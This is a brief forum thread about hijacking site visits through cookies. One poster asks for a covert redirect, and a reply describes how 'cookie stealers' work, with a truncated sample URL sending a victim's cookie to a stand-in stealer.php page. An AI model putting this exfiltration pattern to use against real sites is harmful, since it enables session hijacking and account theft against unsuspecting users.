Cookie redirection

Questions about programming languages and debugging
Post Reply
User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:

Cookie redirection

Post by ayu »

Is there anyway to make a cookie that when someone enters my site lets say www.lol.com they get the cookie and the cookie makes a redirection so that when they enter a site that is specified in the cookie like www.site.com it redirects it to mine... if heard of it but never encountred it.

User avatar
Gogeta70
^_^
^_^
Posts: 3275
Joined: 25 Jun 2005, 16:00
18

Post by Gogeta70 »

Actually, these cookie stealers are very common. And a good coder can make it seem like your cookie was stolen, and you won't even know it. However, most the time, a person makes a script that redirects to their page like this: http://somesite.com/stealer.php?cookie= ... t.cookie();
and then redirect the page back to where you were or something of the sort.
¯\_(ツ)_/¯ It works on my machine...

Post Reply